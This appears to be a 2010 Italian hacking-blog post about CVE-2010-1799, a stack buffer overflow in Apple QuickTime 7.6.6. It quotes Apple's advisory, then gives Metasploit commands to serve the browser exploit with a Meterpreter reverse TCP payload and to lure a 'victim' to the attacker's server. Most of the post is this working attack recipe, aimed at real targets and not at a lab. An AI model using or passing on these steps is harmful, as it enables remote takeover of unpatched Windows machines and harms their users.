[METASPLOIT]Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow
Nuova falla per Apple QuickTime 7.6.6 fixata il 12 agosto 2010, con il rilascio della versione 7.6.7.
Dal sito ufficiale:
CVE-ID: CVE-2010-1799
Available for: Windows 7, Vista, XP SP2 or later
Impact: Viewing a maliciously crafted movie file may lead to un unexpected application termination or arbitrary code execution.Description: A stack buffer overflow exists in QuickTime’s error logging. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed by disabling debug logging. This issue does not affect Mac OS X systems.
Vediamo come utilizzare questo exploit con metasploit o.O
Aggiorniamo metasploit:
sudo svn update
Prendiamo l’exploit:
use windows/browser/apple_quicktime_smil_debug
Nostro ip, dove andrà in ascolto il server sulla 8080 (porta cambiabile show options)
set SRVHOST IP
set URIPATH /
Usiamo meterpreter:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP
exploit
Adesso facciamo visitare alla vittima:
IP:8080
Good Luck :D
Related posts:
- [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
- [guida]Oday-Exploit Adobe Reader: Hack di Windows con metasploit
- IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
- Hack di WINDOWS con metasploit e IE 0day aka (Aurora) exploit
- KiTrap0D Virtual-DOS oday per metasploit :)
This entry was posted on Saturday, August 14th, 2010 at 11:56 am and is filed under Hacking. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
Tagged with: Apple • attack • codec • metasploit • oday • remote
Pingback: [METASPLOIT]Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow | ItaliaON
Pingback: Apple QuickTime | Clshack